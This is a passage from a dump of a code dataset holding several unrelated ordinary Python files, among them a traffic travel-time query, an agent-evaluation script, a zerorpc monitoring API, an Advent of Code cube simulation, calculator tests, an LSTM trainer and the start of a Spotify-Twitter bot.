\n length = document[\"location\"][\"stationlength\"]\n if length is not None:\n total_length += length\n # Add speed if it isn't null\n speed = document[\"recorded\"][\"speed\"]\n if speed is not None:\n total_speed += speed \t \n num_speeds += 1\n\n # Calculate average speed \n avg_speed = total_speed/num_speeds\n # Returns total travel time in seconds \t\n return (total_length/avg_speed)*3600 \n \n\n# Get total travel time in seconds for each 5 minute interval for 24 hours from station Foster NB\ndef query3():\n hour = 0\n # Time constants\n min_per_hour = 60\n hours_per_day = 24\n \n # For each hour in the day \n for hour in range(0, hours_per_day):\n # For each 5 minute interval\n for minute in range(0, min_per_hour, 5):\n\n start = datetime(2011, 9, 22, hour, minute); \n \n # Edge cases at end of the hour\n if(minute <= 50):\n end = datetime(2011, 9, 22, hour, minute + 5);\n if(minute == 55 and hour < hours_per_day - 1):\n end = datetime(2011, 9, 22, hour + 1, 0)\n\n # Move to next hour \n if(minute >= 60):\n hour += 1\n minute = 0\n end = datetime(2011, 9, 22, hour, minute) \n\n print(\"Start time: \" + str(start))\n print(\"End time: \" + str(end))\n print()\n print(\"Travel time for this interval (in seconds): \" + str(foster_nb_travel_time(start, end)))\n print()\n print()\n # Increment start to next interval \n start = end\n \n\n\n return \n\n# Run query \nquery3()\n\n","sub_path":"query3.py","file_name":"query3.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"347468901","text":"import concurrent.futures\r\nimport math\r\nimport pickle\r\nimport numpy as np\r\nimport importlib\r\nfrom datetime import datetime\r\nfrom pathlib import Path\r\nfrom python.src import Utility, HelperFunctions\r\nfrom statistics import NormalDist\r\n\r\n# adjustable values\r\nnum_trials = 100\r\nnum_cycles = 10000\r\nfloating_precision_factor = 25\r\n\r\n# set and confirm paths for saved data\r\ndata_dir_path = Utility.get_data_path()\r\nPath(data_dir_path).mkdir(parents=True, exist_ok=True)\r\napiq_dict_path = data_dir_path.joinpath('apiq_dict.apiq')\r\n\r\n# import agents and environments\r\nagent_module = importlib.import_module(\"python.src.agents\")\r\nenvironment_module = importlib.import_module(\"python.src.environments\")\r\nagent_classes = {getattr(agent_module, class_name) for class_name in agent_module.__all__}\r\nenvironment_classes = {getattr(environment_module, class_name) for class_name in environment_module.__all__}\r\n\r\n# Loads already evaluated agent-environment combinations into reward dict\r\nreward_dict = {}\r\nfor ag_class in agent_classes:\r\n ag = ag_class.__name__\r\n for env_class in environment_classes:\r\n env = env_class.__name__\r\n Utility.nested_set(reward_dict, [ag, env, \"positive\", \"rewards\"], [])\r\n Utility.nested_set(reward_dict, [ag, env, \"negative\", \"rewards\"], [])\r\n path = data_dir_path.joinpath(ag + \"_\" + env + \".apiq\")\r\n if path.is_file():\r\n rewards = pickle.load(path.open(\"rb\"))\r\n Utility.nested_set(reward_dict, [ag, env], rewards)\r\n\r\n# calculate complexities of environments and compile in dict sorted by complexity\r\ncomplexity_dict = {}\r\nfor environment_class in environment_classes:\r\n complexity = HelperFunctions.calculate_complexity(environment_class())\r\n complexity_dict[environment_class.__name__] = complexity\r\ncomplexity_dict = {k: v for k, v in sorted(complexity_dict.items(), key=lambda item: item[1])}\r\n\r\n# calculate discrete distribution, continuous distribution and scaling factors\r\ncomplexities = complexity_dict.values()\r\nmax_c = max(complexities)\r\nmin_c = min(complexities)\r\ndiscrete_distribution = [0] * (max_c + 1)\r\nfor value in complexity_dict.values():\r\n discrete_distribution[value] += 1\r\nsigma = math.sqrt((max_c - min_c + 1) / len(complexities))\r\nnormal_distribution = [NormalDist(0, sigma).pdf(x) for x in range(math.floor(-3 * sigma), math.ceil(3 * sigma))]\r\nhalf_len = math.floor(len(normal_distribution) / 2)\r\ncontinuous_distribution = np.convolve(discrete_distribution, normal_distribution)\r\ncontinuous_distribution = continuous_distribution[half_len:-half_len + 1]\r\nscaling_factor_dict = {}\r\nfor k, v in complexity_dict.items():\r\n scaling_factor_dict[k] = 1 / continuous_distribution[v]\r\n\r\n# calculate pairs to be trialed\r\nagent_environment_pairs = set()\r\nfor agent_class in agent_classes:\r\n ag_name = agent_class.__name__\r\n reward_dict.setdefault(ag_name, {})\r\n for environment_class in environment_classes:\r\n if len(reward_dict[ag_name][environment_class.__name__][\"positive\"][\"rewards\"]) == 0:\r\n agent_environment_pairs.add((agent_class, environment_class))\r\n\r\n# parallel execution of trials of agents in environments\r\ntime_start = datetime.now()\r\nprint(\"----------------------------------------\")\r\nprint(\"Trialing agents in environments...\")\r\nwith concurrent.futures.ProcessPoolExecutor() as executor:\r\n future_list = []\r\n seed = 1\r\n a, m = 48271, (pow(2, 31) - 1)\r\n for pair in agent_environment_pairs:\r\n future_list.append(executor.submit(HelperFunctions.trial, pair, \"0\", num_trials, num_cycles, seed))\r\n seed = (seed * a) % m\r\n future_list.append(executor.submit(HelperFunctions.trial, pair, \"1\", num_trials, num_cycles, seed))\r\n seed = (seed * a) % m\r\n idx = 1\r\n for future in concurrent.futures.as_completed(future_list):\r\n ag_name, env_name, sign, rewards = future.result()\r\n reward_dict[ag_name][env_name][sign][\"rewards\"] = rewards\r\n print(\" {:d}/{:d} done.\".format(idx, len(future_list)))\r\n idx += 1\r\ntime_end = datetime.now()\r\n\r\n# calculate mean and std of rewards and add them to reward dictionary\r\nfor ag_name in reward_dict:\r\n for env_name in reward_dict[ag_name]:\r\n for sign in [\"positive\", \"negative\"]:\r\n collected_rewards = reward_dict[ag_name][env_name][sign][\"rewards\"]\r\n reward_dict[ag_name][env_name][sign][\"mean\"] = np.mean(collected_rewards)\r\n reward_dict[ag_name][env_name][sign][\"error\"] = np.std(collected_rewards, dtype=np.float64, ddof=1)\r\n\r\n# calculate apiq_dict\r\napiq_dict = {}\r\nnorming_factor = sum(scaling_factor_dict.values())\r\nfor ag_name in reward_dict:\r\n apiq_mean = 0\r\n apiq_error = 0\r\n for env_name in reward_dict[ag_name]:\r\n ag_env_dict = reward_dict[ag_name][env_name]\r\n factor = scaling_factor_dict[env_name]\r\n positive_mean = ag_env_dict[\"positive\"][\"mean\"]\r\n p_err = ag_env_dict[\"positive\"][\"error\"]\r\n negative_mean = ag_env_dict[\"negative\"][\"mean\"]\r\n n_err = ag_env_dict[\"negative\"][\"error\"]\r\n apiq_mean += (positive_mean + negative_mean) * factor\r\n apiq_error += (p_err * p_err + n_err * n_err) * factor * factor\r\n apiq_mean /= norming_factor\r\n apiq_error = np.sqrt(apiq_error) / norming_factor\r\n Utility.nested_set(apiq_dict, [ag_name, \"mean\"], apiq_mean)\r\n Utility.nested_set(apiq_dict, [ag_name, \"error\"], apiq_error)\r\n\r\n# print and save complexities\r\nprint(\"----------------------------------------\")\r\nprint(\"Complexitiy - Number of Bytecode instructions:\")\r\nfor k in complexity_dict:\r\n print(\" {:s}: {:d}\".format(k, complexity_dict[k]))\r\ncomplexity_dict_path = data_dir_path.joinpath(\"complexity_dict.apiq\")\r\npickle.dump(complexity_dict, complexity_dict_path.open(\"wb\"))\r\n\r\n# print and save scaling_factors\r\n# save environment distributions\r\nprint(\"----------------------------------------\")\r\nprint(\"Scaling Factor - Inverse of density function:\")\r\nfor k in scaling_factor_dict:\r\n print(\" {:s}: {:f}\".format(k, scaling_factor_dict[k]))\r\nscaling_factor_dict_path = data_dir_path.joinpath(\"scaling_factor_dict.apiq\")\r\npickle.dump(complexity_dict, scaling_factor_dict_path.open(\"wb\"))\r\ndiscrete_distribution_path = data_dir_path.joinpath(\"discrete_distribution.apiq\")\r\npickle.dump(discrete_distribution, discrete_distribution_path.open(\"wb\"))\r\ncontinuous_distribution_path = data_dir_path.joinpath(\"continuous_distribution.apiq\")\r\npickle.dump(continuous_distribution, continuous_distribution_path.open(\"wb\"))\r\n\r\n# save rewards in separate files for easy reuse\r\nfor ag_name in reward_dict:\r\n for env_name in reward_dict[ag_name]:\r\n data_path = data_dir_path.joinpath(ag_name + \"_\" + env_name + \".apiq\")\r\n pickle.dump(reward_dict[ag_name][env_name], data_path.open(\"wb\"))\r\n\r\n# sort, print and save reward dict\r\nprint(\"----------------------------------------\")\r\nprint(\"Positive and negative rewards:\")\r\nprint(time_end - time_start)\r\nagent_list = [\"PiRand\", \"PiBasic\", \"Pi2Back\", \"Pi2Forward\", \"Handcrafted\", \"NNsigmoid\", \"NNsigmoid4\", \"NNrelu\",\r\n \"NNrelu4\", \"NNreluSigmoid\", \"NNrelu4Sigmoid\"]\r\nagent_list.extend([k for k in reward_dict if k not in agent_list])\r\nUtility.sort_dict(reward_dict, agent_list)\r\nenvironment_list = [k for k in complexity_dict]\r\nfor a in reward_dict:\r\n Utility.sort_dict(reward_dict[a], environment_list)\r\nfor a in reward_dict:\r\n print(\" {}:\".format(a))\r\n for e in reward_dict[a]:\r\n temp = reward_dict[a][e]\r\n positive = temp[\"positive\"][\"mean\"]\r\n negative = temp[\"negative\"][\"mean\"]\r\n p_err = temp[\"positive\"][\"error\"]\r\n n_err = temp[\"negative\"][\"error\"]\r\n print(\" {:s}: {:.5f} +- {:.5f}, {:.5f} +- {:.5f}\".format(e, positive, p_err, negative, n_err))\r\nreward_dict_path = data_dir_path.joinpath(\"reward_dict.apiq\")\r\npickle.dump(reward_dict, reward_dict_path.open(\"wb\"))\r\n\r\n# print and save apiq\r\nprint(\"----------------------------------------\")\r\nprint(\"APIQ:\")\r\nUtility.sort_dict(apiq_dict, agent_list)\r\nfor a in apiq_dict:\r\n print(\" {:s}: {:.5f} +- {:.5f}\".format(a, apiq_dict[a][\"mean\"], apiq_dict[a][\"error\"]))\r\npickle.dump(apiq_dict, apiq_dict_path.open(\"wb\"))\r\n\r\n\r\n","sub_path":"python/src/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"54673709","text":"\"\"\"\nCopyright (c) 2015 SONATA-NFV\nALL RIGHTS RESERVED.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nNeither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]\nnor the names of its contributors may be used to endorse or promote\nproducts derived from this software without specific prior written\npermission.\n\nThis work has been performed in the framework of the SONATA project,\nfunded by the European Commission under Grant number 671517 through\nthe Horizon 2020 and 5G-PPP programmes. The authors would like to\nacknowledge the contributions of their colleagues of the SONATA\npartner consortium (www.sonata-nfv.eu).\n\"\"\"\n\"\"\"\nDistributed Cloud Emulator (dcemulator)\nNetworking and monitoring functions\n(c) 2015 by Steven Van Rossem \n\"\"\"\n\nimport logging\nimport threading\nimport zerorpc\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass ZeroRpcApiEndpointDCNetwork(object):\n \"\"\"\n Simple API endpoint that offers a zerorpc-based\n interface. This interface will be used by the\n default command line client.\n It can be used as a reference to implement\n REST interfaces providing the same semantics,\n like e.g. OpenStack compute API.\n \"\"\"\n\n def __init__(self, listenip, port, DCNetwork=None):\n if DCNetwork :\n self.connectDCNetwork(DCNetwork)\n self.ip = listenip\n self.port = port\n logging.debug(\"Created monitoring API endpoint %s(%s:%d)\" % (\n self.__class__.__name__, self.ip, self.port))\n\n def connectDCNetwork(self, net):\n self.net = net\n logging.info(\"Connected DCNetwork to API endpoint %s(%s:%d)\" % (\n self.__class__.__name__, self.ip, self.port))\n\n def start(self):\n thread = threading.Thread(target=self._api_server_thread, args=())\n thread.daemon = True\n thread.start()\n logging.debug(\"Started API endpoint %s(%s:%d)\" % (\n self.__class__.__name__, self.ip, self.port))\n\n def _api_server_thread(self):\n s = zerorpc.Server(DCNetworkApi(self.net))\n s.bind(\"tcp://%s:%d\" % (self.ip, self.port))\n s.run()\n\n def stop(self):\n logging.info(\"Stop the monitoring API endpoint\")\n return\n\n\nclass DCNetworkApi(object):\n \"\"\"\n The networking and monitoring commands need the scope of the\n whole DC network to find the requested vnf. So this API is intended\n to work with a DCNetwork.\n Just pass through the corresponding request to the\n selected data center network. Do not implement provisioning\n logic here because will will have multiple API\n endpoint implementations at the end.\n \"\"\"\n\n def __init__(self, net):\n self.net = net\n\n def network_action_start(self, vnf_src_name, vnf_dst_name, kwargs):\n # call DCNetwork method, not really datacenter specific API for now...\n # provided dc name needs to be part of API endpoint\n # no check if vnfs are really connected to this datacenter...\n logging.debug(\"RPC CALL: network chain start\")\n try:\n c = self.net.setChain(\n vnf_src_name, vnf_dst_name,\n vnf_src_interface=kwargs.get('vnf_src_interface'),\n vnf_dst_interface=kwargs.get('vnf_dst_interface'),\n cmd='add-flow',\n weight=kwargs.get('weight'),\n match=kwargs.get('match'),\n bidirectional=kwargs.get('bidirectional'),\n cookie=kwargs.get('cookie'))\n return str(c)\n except Exception as ex:\n logging.exception(\"RPC error.\")\n return ex.message\n\n def network_action_stop(self, vnf_src_name, vnf_dst_name, kwargs):\n # call DCNetwork method, not really datacenter specific API for now...\n # provided dc name needs to be part of API endpoint\n # no check if vnfs are really connected to this datacenter...\n logging.debug(\"RPC CALL: network chain stop\")\n try:\n c = self.net.setChain(\n vnf_src_name, vnf_dst_name,\n vnf_src_interface=kwargs.get('vnf_src_interface'),\n vnf_dst_interface=kwargs.get('vnf_dst_interface'),\n cmd='del-flows',\n weight=kwargs.get('weight'),\n match=kwargs.get('match'),\n bidirectional=kwargs.get('bidirectional'),\n cookie=kwargs.get('cookie'))\n return c\n except Exception as ex:\n logging.exception(\"RPC error.\")\n return ex.message\n\n # setup the rate measurement for a vnf interface\n def setup_metric(self, vnf_name, vnf_interface, metric):\n logging.debug(\"RPC CALL: setup metric\")\n try:\n c = self.net.monitor_agent.setup_metric(vnf_name, vnf_interface, metric)\n return c\n except Exception as ex:\n logging.exception(\"RPC error.\")\n return ex.message\n\n # remove the rate measurement for a vnf interface\n def stop_metric(self, vnf_name, vnf_interface, metric):\n logging.debug(\"RPC CALL: stop metric\")\n try:\n c = self.net.monitor_agent.stop_metric(vnf_name, vnf_interface, metric)\n return c\n except Exception as ex:\n logging.exception(\"RPC error.\")\n return ex.message\n\n # setup the flow metrics measurement\n def setup_flow(self, vnf_name, vnf_interface, metric, cookie):\n logging.debug(\"RPC CALL: setup flow\")\n try:\n c = self.net.monitor_agent.setup_flow(vnf_name, vnf_interface, metric, cookie)\n return c\n except Exception as ex:\n logging.exception(\"RPC error.\")\n return ex.message\n\n # remove the flow metrics measurement\n def stop_flow(self, vnf_name, vnf_interface, metric, cookie):\n logging.debug(\"RPC CALL: stop flow\")\n try:\n c = self.net.monitor_agent.stop_flow(vnf_name, vnf_interface, metric, cookie)\n return c\n except Exception as ex:\n logging.exception(\"RPC error.\")\n return ex.message\n\n # do prometheus query\n def prometheus(self, dc_label, vnf_name, vnf_interface, query):\n logging.debug(\"RPC CALL: query prometheus\")\n vnf_status = self.net.dcs.get(dc_label).containers.get(vnf_name).getStatus()\n uuid = vnf_status['id']\n query = query.replace('', uuid)\n #if needed, replace interface id with emu-intfs name\n # query = query.replace('', vnf_interface)\n logging.info('query: {0}'.format(query))\n try:\n c = self.net.monitor_agent.query_Prometheus(query)\n return c\n except Exception as ex:\n logging.exception(\"RPC error.\")\n return ex.message\n\n\n\n","sub_path":"src/emuvim/api/zerorpc/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"38108801","text":"import os\r\nDEBUG = True\r\nDEBUG_PROPAGATE_EXCEPTIONS = True\r\nTEMPLATE_DEBUG = DEBUG\r\nLANGUAGE_CODE = 'ja'\r\nDEFAULT_CHARSET = 'utf-8'\r\nDEFAULT_FROM_EMAIL = 'webmaster@example.com'\r\nROOT_URLCONF = 'urls'\r\nROOT_PATH = os.path.dirname(__file__)\r\nTEMPLATE_DIRS = (ROOT_PATH + '/template')\r\nUSE_I18N = False","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492091898","text":"from typing import NamedTuple\nfrom dataclasses import dataclass\nfrom itertools import product\nimport numpy as np\n\n\nSAMPLE = \"\"\".#.\n..#\n###\"\"\"\n\nCUBEMAP = \"\"\"...###.#\n#.#.##..\n.##.##..\n..##...#\n.###.##.\n.#..##..\n.....###\n.####..#\"\"\"\n\n@dataclass\nclass Cube(dict):\n x: int\n y: int\n z: int\n state: bool\n search_space: tuple \n \n @staticmethod\n def create(x0: int, y0: int, z0: int, start_state: bool):\n search_space = [-1, 0, 1]\n search_space = tuple((x, y, z) for x in search_space \n for y in search_space \n for z in search_space \n if (x, y, z) != (0, 0, 0)\n )\n return Cube(x0, y0, z0, start_state, search_space)\n \n def __repr__(self):\n return f\"{self.state} Cube({self.x}, {self.y}, {self.z})\"\n \n @property\n def show(self):\n if self.state is True:\n return \"#\"\n else:\n return \".\"\n \n def true_neighbors(self, fullmap: np.array):\n \"\"\"Count the number of activated cubes within the neighboring 3D zone\"\"\"\n neighbor_states = []\n \n for vec in self.search_space:\n cur = {\"x\": self.x + vec[0],\n \"y\": self.y + vec[1],\n \"z\": self.z + vec[2]}\n \n interior_x = (0 <= cur[\"x\"] < fullmap.shape[0])\n interior_y = (0 <= cur[\"y\"] < fullmap.shape[1])\n interior_z = (0 <= cur[\"z\"] < fullmap.shape[2])\n \n if all([interior_x, interior_y, interior_z]):\n vec_state = fullmap[cur[\"x\"], cur[\"y\"], cur[\"z\"]].state\n neighbor_states.append(vec_state)\n return sum(neighbor_states)\n \n def turn_on(self):\n self.state = True\n return self\n \n \n@dataclass\nclass CubeMap(dict):\n grid: np.array\n full_dim: int \n \n @staticmethod\n def read_map(raw_data: str, turns=8):\n \"\"\"Instantiate a map from a string with a 2D layer \n that sits half-way through the Z-coordinate space\n \"\"\"\n data = [[True if x == \"#\" else False for x in row]\n for row in raw_data.split(\"\\n\")]\n data = [[Cube.create(x + turns, y + turns, turns, val) \n for y, val in enumerate(row)] \n for x, row in enumerate(data)]\n width = len(data[0])\n height = len(data)\n max_size = 2*turns + max(width, height)\n full_grid = product(range(max_size), range(max_size), range(max_size))\n canvas = np.array([Cube.create(x, y, z, False) for x, y, z in full_grid]\n ).reshape(max_size, max_size, max_size) \n canvas[turns: turns+width, turns: turns+height, turns] = data\n return CubeMap(grid=canvas, full_dim=max_size)\n \n def __repr__(self):\n return f\"CubeMap{self.grid.shape}\"\n \n @property\n def blank_canvas(self):\n dim = self.full_dim\n full_grid = product(range(dim), range(dim), range(dim))\n canvas = np.array([Cube.create(x, y, z, False) for x, y, z in full_grid]\n ).reshape(dim, dim, dim)\n return canvas\n \n @property\n def all_states(self):\n return np.vectorize(lambda x: x.state)(self.grid)\n \n @property\n def neighbor_states(self):\n return np.vectorize(lambda x: x.true_neighbors(self.grid))(self.grid)\n \n @property\n def count(self):\n return np.sum(self.all_states)\n\n def cycle_once(self):\n \"\"\"Simultaneously follow these 3 rules for every cube in the grid:\n 1) if ON & (2 or 3 ON neighbors): stay ON\n 2) if OFF & (exactly 3 ON neighbhors): turn ON\n 3) otherwise turn/stay OFF\n \"\"\"\n grid = self.grid\n \n two_or_three = np.logical_or(self.neighbor_states == 2, self.neighbor_states == 3)\n stay_on = np.logical_and(self.all_states == True, two_or_three)\n \n turn_on = np.logical_and(self.all_states == False, self.neighbor_states == 3)\n \n new_grid = self.blank_canvas.copy()\n if stay_on.any():\n new_grid[stay_on] = np.vectorize(lambda x: x.turn_on())(grid[stay_on])\n if turn_on.any():\n new_grid[turn_on] = np.vectorize(lambda x: x.turn_on())(grid[turn_on])\n self.grid = new_grid\n print(f\"Total Activated: {self.count}\")\n return self\n \n def cycle_many(self, k):\n for _ in range(k):\n self.cycle_once()\n return self.count\n \n def show(self):\n \"\"\"Render a printable display w/ matching notation to the examples\"\"\"\n xs, ys, zs = np.where(galaxy.all_states == True)\n \n smaller = self.grid[min(xs):max(xs)+1, min(ys): max(ys)+1, min(zs): max(zs)+1].copy() \n smaller = np.vectorize(lambda x: x.show)(smaller)\n \n for i in range(smaller.shape[2]):\n \n print(f\"z={i - smaller.shape[2] // 2}\")\n plane = smaller[:, :, i]\n result = '\\n'.join([''.join(row) for row in plane])\n print(result, \"\\n\")\n \n return\n \n \ngalaxy = CubeMap.read_map(SAMPLE)\n#galaxy.show()\nassert galaxy.cycle_many(6) == 112\n\n \nif __name__ == \"__main__\":\n galaxy = CubeMap.read_map(CUBEMAP)\n print(galaxy.cycle_many(6))\n ","sub_path":"day17/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"371729468","text":"import pytest\n\nfrom lab_11.tasks.tools.calculator import (\n Calculator,\n CalculatorError,\n EmptyMemory,\n NotNumberArgument,\n WrongOperation,\n)\n\ntest_run_data = [\n (\"+\", 1, 2, 3),\n (\"-\", 1, 2, -1),\n (\"*\", 1, -2, -2),\n (\"/\", 1, -2, -0.5),\n]\n\ntest_run__invalid_data = [\n (\"^\", 1, 2, WrongOperation),\n (\"-\", \"foo\", 2, NotNumberArgument),\n (\"*\", 1, \"bar\", NotNumberArgument),\n (\"/\", 1, 0, CalculatorError),\n (\"/\", 1, 0.0, CalculatorError),\n (\"/\", 2, None, EmptyMemory),\n]\n\n\n@pytest.fixture(scope=\"function\")\ndef calculator():\n print(\"\\nNew calculator...\")\n return Calculator()\n\n\n@pytest.mark.parametrize(\"operator,arg1,arg2,expected\", test_run_data)\ndef test_run_valid_operations(operator, arg1, arg2, expected, calculator):\n result = calculator.run(operator, arg1, arg2)\n assert result == expected\n\n\n@pytest.mark.parametrize(\"operator,arg1,arg2,expected\", test_run__invalid_data)\ndef test_run_invalid_data_raises_exceptions(operator, arg1, arg2, expected, calculator):\n with pytest.raises(expected):\n calculator.run(operator, arg1, arg2)\n\n\ndef test_memory_functionality(calculator: \"Calculator\"):\n calculator.run(\"+\", 1, 2)\n assert calculator._short_memory == 3\n calculator.memorize()\n assert calculator.memory == 3\n calculator.clean_memory()\n with pytest.raises(EmptyMemory):\n calculator.in_memory()\n with pytest.raises(EmptyMemory):\n calculator.memory\n","sub_path":"lab_11/tasks/tests/test_task1.py","file_name":"test_task1.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"448402529","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom sklearn.metrics import f1_score\n\nclass LSTMClassifier(nn.Module):\n\n def __init__(self, input_dim, hidden_dim, layer_dim, output_dim, device):\n super().__init__()\n self.hidden_dim = hidden_dim\n self.layer_dim = layer_dim\n self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True)\n # self.fc1 = nn.Linear(hidden_dim, hidden_dim)\n # self.fc2 = nn.Linear(hidden_dim, hidden_dim)\n self.fc_out = nn.Linear(hidden_dim, output_dim)\n self.batch_size = None\n self.hidden = None\n self.device = device\n\n def forward(self, x):\n h0, c0 = self.init_hidden(x)\n out, (hn, cn) = self.rnn(x, (h0, c0))\n out = out[:, -1, :]\n # out = F.relu(self.fc1(out))\n # out = F.relu(self.fc2(out))\n out = self.fc_out(out)\n return out\n\n def init_hidden(self, x):\n h0 = torch.zeros(self.layer_dim, x.size(0), self.hidden_dim)\n c0 = torch.zeros(self.layer_dim, x.size(0), self.hidden_dim)\n return [t.to(self.device) for t in (h0, c0)]\n\ndef Trainer(model, trn_dl, val_dl, n_epochs, sched, opt, criterion, device, patience, dst_path=\"best.pth\"):\n print('Start model training')\n print(model)\n trials = 0\n best_acc = 0\n best_score = 0\n\n for epoch in range(1, n_epochs + 1):\n\n for i, (x_batch, y_batch) in enumerate(trn_dl):\n model.train()\n x_batch = x_batch.to(device)\n y_batch = y_batch.to(device)\n opt.zero_grad()\n out = model(x_batch)\n loss = criterion(out, y_batch)\n loss.backward()\n opt.step()\n sched.step()\n\n model.eval()\n correct, total = 0, 0\n total_preds, total_y = [], []\n for x_val, y_val in val_dl:\n x_val, y_val = [t.to(device) for t in (x_val, y_val)]\n out = model(x_val)\n preds = F.log_softmax(out, dim=1).argmax(dim=1)\n total += y_val.size(0)\n correct += (preds == y_val).sum().item()\n\n total_preds.append(preds)\n total_y.append(y_val)\n\n acc = correct / total\n total_preds = np.concatenate([p.to(\"cpu\") for p in total_preds])\n total_y = np.concatenate([y.to(\"cpu\") for y in total_y])\n score = f1_score(total_y, total_preds, average=\"macro\")\n\n if epoch % 10 == 0:\n print(f'Epoch: {epoch:3d}. Loss: {loss.item():.4f}. F1 score: {score:2.2%}, Acc.: {acc:2.2%}')\n\n if score > best_score:\n trials = 0\n best_score = score\n torch.save(model.state_dict(), dst_path)\n print(f'Epoch {epoch} best model saved with f1_score: {best_score:2.2%}')\n else:\n trials += 1\n if trials >= patience:\n print(f'Early stopping on epoch {epoch}')\n break\n\n return best_score","sub_path":"deep_ts.py","file_name":"deep_ts.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"137158617","text":"# -*- coding:utf-8 -*-\n# @Desc: \n# @Author: Administrator\n# @Date: 2018-04-29 13:23\n\n# 函数的参数\n\n'''\n 定义函数时,小括号里面的变量称为形参\n 调用该函数时,小括号里面传递进去的数据为实参 \n 实参与形参的对应的\n'''\n\n# 定义一个函数,用来求两个数的和\n# 函数调用时.传递进来的数据(实参)与定义函数中的变量(形参)是一一对应的(即参数个数与参数顺序都对应)\ndef add2num(x,y):\n sum = x + y\n print(\"两个数的和:sum = %d\"%sum)\n print(\"%d + %d = %d\"%(x,y,sum))\n # return sum :在函数中有return时,是把这个函数的结果返回回去,\n # 外界在调用这个函数时需要一个变量来接受这个函数返回的结果\n return sum\n\nresult1 = add2num(5,4)\n\n# 调用函数时可以指定形参的值\nresult2 = add2num(x=4,y=5)\n\n# 练习:计算1~ 的指定数据的累积和\ndef sumNums(endNum):\n i = 0\n sum = 0\n while i <= endNum:\n sum = sum + i\n i += 1\n return sum \nresult = sumNums(5)\nprint(result)\n\n\n","sub_path":"01.PythonDoc/04.变量-函数-返回值-参数/10.函数的参数.py","file_name":"10.函数的参数.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"24400842","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n@author: Naoto Hori\n'''\nimport sys\nfrom cafysis.file_io.pdb import PdbFile\n\nif len(sys.argv) != 4:\n print ('\\n Usage: SCRIPT [bfactor file] [PDB file] [output bfactor file]\\n')\n sys.exit(2)\n\nf_bf_in = open(sys.argv[1], 'r')\nf_pdb = PdbFile(sys.argv[2])\nf_pdb.open_to_read()\nchains = f_pdb.read_all()\nf_pdb.close()\nf_bf_out = open(sys.argv[3], 'w')\n\nf_bf_out.write('## SCRIPT: bfactor_average_residue.py\\n')\nf_bf_out.write('## argv[1]: '+sys.argv[1]+'\\n')\nf_bf_out.write('## argv[2]: '+sys.argv[2]+'\\n')\nf_bf_out.write('## argv[3]: '+sys.argv[3]+'\\n')\nf_bf_out.write('\\n\\n')\n\nbf = []\nfor line in f_bf_in :\n if line.find('#') != -1 :\n continue\n bf.append(float(line.split()[1]))\n \n# current version is only for single chain\n#if len(chains) != 1:\n# print ('Error: len(chains) != 1')\n# sys.exit(2)\n \nimp = 0\nfor c in chains:\n sum_np = 0.0\n n_np = 0\n for r in c.residues:\n sum_p = sum_np\n sum_b = 0.0\n sum_s = 0.0\n sum_np = 0.0\n sum_pro = 0.0\n n_p = n_np\n n_b = 0\n n_s = 0\n n_np = 0\n n_pro = 0\n for a in r.atoms:\n if a.name[0:1] == 'H' or a.name[0:2] == ' H' :\n # print a.name, 'Hydrogen'\n pass\n elif a.name == ' CA ':\n sum_pro += bf[imp]\n n_pro += 1\n elif a.name == \" O3'\" :\n # print a.name, 'next P'\n sum_np += bf[imp] \n n_np += 1\n elif a.name.find(\"'\") != -1:\n # print a.name, 'S'\n sum_s += bf[imp]\n n_s += 1\n elif a.name in (\" P \", \" OP1\", \" OP2\", \"OP3\") :\n # print a.name, 'P'\n sum_p += bf[imp]\n n_p += 1\n else :\n # print imp,a.name, 'B'\n sum_b += bf[imp]\n n_b += 1\n imp += 1\n if n_pro == 0:\n if n_p != 0:\n f_bf_out.write('%f\\n' % (sum_p/float(n_p) ,))\n if n_s != 0:\n f_bf_out.write('%f\\n' % (sum_s/float(n_s) ,))\n if n_b != 0:\n f_bf_out.write('%f\\n' % (sum_b/float(n_b) ,))\n else:\n f_bf_out.write('%f\\n' % (sum_pro/float(n_pro), ))\n","sub_path":"bfactor_average_residue.py","file_name":"bfactor_average_residue.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"73959045","text":"from pytz import timezone\nfrom datetime import datetime\n#from time import sleep\nfrom secret import *\nimport spotipy\nimport tweepy\n#import schedule\n\ndef isPlaying():\n if sp.currently_playing() != None:\n return True\n else:\n return False\n \ndef spotifySongInfo():\n # get info on current song, returns as a dictionary, access the information\n currentSongInformation = sp.currently_playing()\n songName = currentSongInformation['item']['name']\n if (currentSongInformation['item']['album']['album_type'] == 'single'):\n albumName = None\n else:\n albumName = currentSongInformation['item']['album']['name']\n 